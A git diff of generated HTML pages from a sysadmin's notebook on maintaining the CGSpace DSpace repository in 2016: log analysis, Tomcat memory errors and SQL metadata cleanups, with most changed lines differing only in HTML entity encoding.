<li>After one week of logging TLS connections on CGSpace:</li>
</ul>
<pre tabindex="0"><code># zgrep &quot;DES-CBC3&quot; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
<pre tabindex="0"><code># zgrep &#34;DES-CBC3&#34; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
217
# zcat -f -- /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
1164376
# zgrep &quot;DES-CBC3&quot; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk '{print $6}' | sort | uniq
# zgrep &#34;DES-CBC3&#34; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk &#39;{print $6}&#39; | sort | uniq
TLSv1/DES-CBC3-SHA
TLSv1/EDH-RSA-DES-CBC3-SHA
</code></pre><ul>
<li>So this represents <code>0.02%</code> of 1.16M connections over a one-week period</li>
<li>Transforming some filenames in OpenRefine so they can have a useful description for SAFBuilder:</li>
</ul>
<pre tabindex="0"><code>value + &quot;__description:&quot; + cells[&quot;dc.type&quot;].value
<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
</code></pre><ul>
<li>This gives you, for example: <code>Mainstreaming gender in agricultural R&amp;D.pdf__description:Brief</code></li>
</ul>
@ -251,7 +251,7 @@ TLSv1/EDH-RSA-DES-CBC3-SHA
<li>If I unzip the original zip from CIAT on Windows, re-zip it with 7zip on Windows, and then unzip it on Linux directly, the file names seem to be proper UTF-8</li>
<li>We should definitely clean filenames so they don&rsquo;t use characters that are tricky to process in CSV and shell scripts, like: <code>,</code>, <code>'</code>, and <code>&quot;</code></li>
</ul>
<pre tabindex="0"><code>value.replace(&quot;'&quot;,&quot;&quot;).replace(&quot;,&quot;,&quot;&quot;).replace('&quot;','')
<pre tabindex="0"><code>value.replace(&#34;&#39;&#34;,&#34;&#34;).replace(&#34;,&#34;,&#34;&#34;).replace(&#39;&#34;&#39;,&#39;&#39;)
</code></pre><ul>
<li>I need to write a Python script to match that for renaming files in the file system</li>
<li>When importing SAF bundles it seems you can specify the target collection on the command line using <code>-c 10568/4003</code> or in the <code>collections</code> file inside each item in the bundle</li>
@ -264,7 +264,7 @@ TLSv1/EDH-RSA-DES-CBC3-SHA
<li>Import CIAT Gender Network records to CGSpace, first creating the SAF bundles as my user, then importing as the <code>tomcat7</code> user, and deleting the bundle, for each collection&rsquo;s items:</li>
</ul>
<pre tabindex="0"><code>$ ./safbuilder.sh -c /home/aorth/ciat-gender-2016-09-06/66601.csv
$ JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
$ JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
$ rm -rf ~/ciat-gender-2016-09-06/SimpleArchiveFormat/
</code></pre><h2 id="2016-09-07">2016-09-07</h2>
<ul>
@ -299,13 +299,13 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<li>I restarted Tomcat and it was ok again</li>
<li>CGSpace crashed a few hours later, errors from <code>catalina.out</code>:</li>
</ul>
<pre tabindex="0"><code>Exception in thread &quot;http-bio-127.0.0.1-8081-exec-25&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Exception in thread &#34;http-bio-127.0.0.1-8081-exec-25&#34; java.lang.OutOfMemoryError: Java heap space
at java.lang.StringCoding.decode(StringCoding.java:215)
</code></pre><ul>
<li>We haven&rsquo;t seen that in quite a while&hellip;</li>
<li>Indeed, in a month of logs it only occurs 15 times:</li>
</ul>
<pre tabindex="0"><code># grep -rsI &quot;OutOfMemoryError&quot; /var/log/tomcat7/catalina.* | wc -l
<pre tabindex="0"><code># grep -rsI &#34;OutOfMemoryError&#34; /var/log/tomcat7/catalina.* | wc -l
15
</code></pre><ul>
<li>I also see a bunch of errors from dspace.log:</li>
@ -315,11 +315,11 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
</code></pre><ul>
<li>Looking at REST requests, it seems there is one IP hitting us nonstop:</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
820 50.87.54.15
12872 70.32.99.142
25744 70.32.83.92
# awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 3
# awk &#39;{print $1}&#39; /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 3
7966 181.118.144.29
54706 70.32.99.142
109412 70.32.83.92
@ -333,7 +333,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
</code></pre><ul>
<li>And more heap space errors:</li>
</ul>
<pre tabindex="0"><code># grep -rsI &quot;OutOfMemoryError&quot; /var/log/tomcat7/catalina.* | wc -l
<pre tabindex="0"><code># grep -rsI &#34;OutOfMemoryError&#34; /var/log/tomcat7/catalina.* | wc -l
19
</code></pre><ul>
<li>There are no more rest requests since the last crash, so maybe there are other things causing this.</li>
@ -349,7 +349,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<li>From the activity control panel I can see 58 unique IPs hitting the site <em>concurrently</em>, which has GOT to hurt our stability</li>
<li>A list of all 2000 unique IPs from CGSpace logs today:</li>
</ul>
<pre tabindex="0"><code># grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: '{print $5}' | sort -n | uniq -c | sort -h | tail -n 100
<pre tabindex="0"><code># grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: &#39;{print $5}&#39; | sort -n | uniq -c | sort -h | tail -n 100
</code></pre><ul>
<li>Looking at the top 20 IPs or so, most are Yahoo, MSN, Google, Baidu, TurnitIn (iParadigm), etc&hellip; do we have any real users?</li>
<li>Generate a list of all author affiliations for Peter Ballantyne to go through, make corrections, and create a lookup list from:</li>
@ -363,7 +363,7 @@ Wed Sep 14 09:47:28 UTC 2016 | Updating : 6/6 docs.
Commit
Commit done
dn:CN=Haman\, Magdalena (CIAT-CCAFS),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-193&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-193&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>And after that I see a bunch of &ldquo;pool error Timeout waiting for idle object&rdquo;</li>
<li>Later, near the time of the next crash I see:</li>
@ -376,7 +376,7 @@ Commit done
Sep 14, 2016 11:32:22 AM com.sun.jersey.server.wadl.generators.WadlGeneratorJAXBGrammarGenerator buildModelAndSchemas
SEVERE: Failed to generate the schema for the JAX-B elements
com.sun.xml.bind.v2.runtime.IllegalAnnotationsException: 2 counts of IllegalAnnotationExceptions
java.util.Map is an interface, and JAXB can't handle interfaces.
java.util.Map is an interface, and JAXB can&#39;t handle interfaces.
this problem is related to the following location:
at java.util.Map
at public java.util.Map com.atmire.dspace.rest.common.Statlet.getRender()
@ -389,7 +389,7 @@ java.util.Map does not have a no-arg default constructor.
</code></pre><ul>
<li>Then 20 minutes later another outOfMemoryError:</li>
</ul>
<pre tabindex="0"><code>Exception in thread &quot;http-bio-127.0.0.1-8081-exec-25&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Exception in thread &#34;http-bio-127.0.0.1-8081-exec-25&#34; java.lang.OutOfMemoryError: Java heap space
at java.lang.StringCoding.decode(StringCoding.java:215)
</code></pre><ul>
<li>Perhaps these particular issues <em>are</em> memory issues, the munin graphs definitely show some weird purging/allocating behavior starting this week</li>
@ -402,7 +402,7 @@ java.util.Map does not have a no-arg default constructor.
<li>Oh great, the configuration on the actual server is different than in configuration management!</li>
<li>Seems we added a bunch of settings to the <code>/etc/default/tomcat7</code> in December, 2015 and never updated our ansible repository:</li>
</ul>
<pre tabindex="0"><code>JAVA_OPTS=&quot;-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts&quot;
<pre tabindex="0"><code>JAVA_OPTS=&#34;-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts&#34;
</code></pre><ul>
<li>So I&rsquo;m going to bump the heap +512m and remove all the other experimental shit (and update ansible!)</li>
<li>Increased JVM heap to 4096m on CGSpace (linode01)</li>
@ -423,14 +423,14 @@ Thu Sep 15 18:45:26 UTC 2016 | Updating : 200/218 docs.
Thu Sep 15 18:45:27 UTC 2016 | Updating : 218/218 docs.
Commit
Commit done
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-247&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-241&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-243&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-258&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-268&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-263&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-280&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;Thread-54216&quot; org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-247&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-241&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-243&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-258&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-268&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-263&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-280&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;Thread-54216&#34; org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb
-e14ef82ee224 to the index; possible analysis error.
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
@ -443,7 +443,7 @@ Exception in thread &quot;Thread-54216&quot; org.apache.solr.client.solrj.impl.H
<li>I bumped the heap space from 4096m to 5120m to see if this is <em>really</em> about heap speace or not.</li>
<li>Looking into some of these errors that I&rsquo;ve seen this week but haven&rsquo;t noticed before:</li>
</ul>
<pre tabindex="0"><code># zcat -f -- /var/log/tomcat7/catalina.* | grep -c 'Failed to generate the schema for the JAX-B elements'
<pre tabindex="0"><code># zcat -f -- /var/log/tomcat7/catalina.* | grep -c &#39;Failed to generate the schema for the JAX-B elements&#39;
113
</code></pre><ul>
<li>I&rsquo;ve sent a message to Atmire about the Solr error to see if it&rsquo;s related to their batch update module</li>
@ -474,7 +474,7 @@ $ ./delete-metadata-values.py -f cg.contributor.affiliation -i affiliations_pb-2
<li>Turns out the Solr search logic switched from OR to AND in DSpace 6.0 and the change is easy to backport: <a href="https://jira.duraspace.org/browse/DS-2809">https://jira.duraspace.org/browse/DS-2809</a></li>
<li>We just need to set this in <code>dspace/solr/search/conf/schema.xml</code>:</li>
</ul>
<pre tabindex="0"><code>&lt;solrQueryParser defaultOperator=&quot;AND&quot;/&gt;
<pre tabindex="0"><code>&lt;solrQueryParser defaultOperator=&#34;AND&#34;/&gt;
</code></pre><ul>
<li>It actually works really well, and search results return much less hits now (before, after):</li>
</ul>
@ -533,12 +533,12 @@ OCSP Response Data:
<li>Discuss fixing some ORCIDs for CCAFS author Sonja Vermeulen with Magdalena Haman</li>
<li>This author has a few variations:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeu
len, S%';
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeu
len, S%&#39;;
</code></pre><ul>
<li>And it looks like <code>fe4b719f-6cc4-4d65-8504-7a83130b9f83</code> is the authority with the correct ORCID linked</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority='fe4b719f-6cc4-4d65-8504-7a83130b9f83w', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;fe4b719f-6cc4-4d65-8504-7a83130b9f83w&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen, S%&#39;;
UPDATE 101
</code></pre><ul>
<li>Hmm, now her name is missing from the authors facet and only shows the authority ID</li>
@ -547,7 +547,7 @@ UPDATE 101
<li>On a clean snapshot of the database I see the correct authority should be <code>f01f7b7b-be3f-4df7-a61d-b73c067de88d</code>, not <code>fe4b719f-6cc4-4d65-8504-7a83130b9f83</code></li>
<li>Updating her authorities again and reindexing:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority='f01f7b7b-be3f-4df7-a61d-b73c067de88d', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;f01f7b7b-be3f-4df7-a61d-b73c067de88d&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen, S%&#39;;
UPDATE 101
</code></pre><ul>
<li>Use GitHub icon from Font Awesome instead of a PNG to save one extra network request</li>
@ -564,8 +564,8 @@ UPDATE 101
<li>Minor fix to a string in Atmire&rsquo;s CUA module (<a href="https://github.com/ilri/DSpace/pull/280">#280</a>)</li>
<li>This seems to be what I&rsquo;ll need to do for Sonja Vermeulen (but with <code>2b4166b7-6e4d-4f66-9d8b-ddfbec9a6ae0</code> instead on the live site):</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen SJ%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;09e4da69-33a3-45ca-b110-7d3f82d2d6d2&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen, S%&#39;;
dspacetest=# update metadatavalue set authority=&#39;09e4da69-33a3-45ca-b110-7d3f82d2d6d2&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen SJ%&#39;;
</code></pre><ul>
<li>And then update Discovery and Authority indexes</li>
<li>Minor fix for &ldquo;Subject&rdquo; string in Discovery search and Atmire modules (<a href="https://github.com/ilri/DSpace/pull/281">#281</a>)</li>
@ -580,7 +580,7 @@ $ ./delete-metadata-values.py -i ilrisubjects-delete-13.csv -f cg.subject.ilri -
<li>DSpace Test (linode02) became unresponsive for some reason, I had to hard reboot it from the Linode console</li>
<li>People on DSpace mailing list gave me a query to get authors from certain collections:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/5472', '10568/5473')));
<pre tabindex="0"><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/5472&#39;, &#39;10568/5473&#39;)));
</code></pre><h2 id="2016-09-30">2016-09-30</h2>
<ul>
<li>Deny access to REST API&rsquo;s <code>find-by-metadata-field</code> endpoint to protect against an upstream security issue (DS-3250)</li>

View File

@ -42,7 +42,7 @@ I exported a random item&rsquo;s metadata as CSV, deleted all columns except id
0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -168,7 +168,7 @@ $ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -
<li>CGSpace crashed a few times today</li>
<li>Generate list of unique authors in CCAFS collections:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/32729', '10568/5472', '10568/5473', '10568/10288', '10568/70974', '10568/3547', '10568/3549', '10568/3531','10568/16890','10568/5470','10568/3546', '10568/36024', '10568/66581', '10568/21789', '10568/5469', '10568/5468', '10568/3548', '10568/71053', '10568/25167'))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
<pre tabindex="0"><code>dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/32729&#39;, &#39;10568/5472&#39;, &#39;10568/5473&#39;, &#39;10568/10288&#39;, &#39;10568/70974&#39;, &#39;10568/3547&#39;, &#39;10568/3549&#39;, &#39;10568/3531&#39;,&#39;10568/16890&#39;,&#39;10568/5470&#39;,&#39;10568/3546&#39;, &#39;10568/36024&#39;, &#39;10568/66581&#39;, &#39;10568/21789&#39;, &#39;10568/5469&#39;, &#39;10568/5468&#39;, &#39;10568/3548&#39;, &#39;10568/71053&#39;, &#39;10568/25167&#39;))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
</code></pre><h2 id="2016-10-05">2016-10-05</h2>
<ul>
<li>Work on more infrastructure cleanups for Ansible DSpace role</li>
@ -190,7 +190,7 @@ $ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -
<li>Re-deploy CGSpace with latest changes from late September and early October</li>
<li>Run fixes for ILRI subjects and delete blank metadata values:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
DELETE 11
</code></pre><ul>
<li>Run all system updates and reboot CGSpace</li>
@ -211,7 +211,7 @@ DELETE 11
<ul>
<li>A bit more cleanup on the CCAFS authors, and run the corrections on DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t &#39;correct name&#39; -m 3 -d dspace -u dspace -p fuuu
</code></pre><ul>
<li>One observation is that there are still some old versions of names in the author lookup because authors appear in other communities (as we only corrected authors from CCAFS for this round)</li>
</ul>
@ -253,35 +253,35 @@ $ git rebase -i dspace-5.5
<li>Start testing some things for DSpace 5.5, like command line metadata import, PDF media filter, and Atmire CUA</li>
<li>Start looking at batch fixing of &ldquo;old&rdquo; ILRI website links without www or https, for example:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ilri.org%';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like &#39;http://ilri.org%&#39;;
</code></pre><ul>
<li>Also CCAFS has HTTPS and their links should use it where possible:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ccafs.cgiar.org%';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like &#39;http://ccafs.cgiar.org%&#39;;
</code></pre><ul>
<li>And this will find community and collection HTML text that is using the old style PNG/JPG icons for RSS and email (we should be using Font Awesome icons instead):</li>
</ul>
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like '%Iconrss2.png%';
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like &#39;%Iconrss2.png%&#39;;
</code></pre><ul>
<li>Turns out there are shit tons of varieties of this, like with http, https, www, separate <code>&lt;/img&gt;</code> tags, alignments, etc</li>
<li>Had to find all variations and replace them individually:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;/&gt;','&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;/&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/Iconrss2.png&quot;/&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/email.jpg&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;/&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;/&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;/&gt;%';
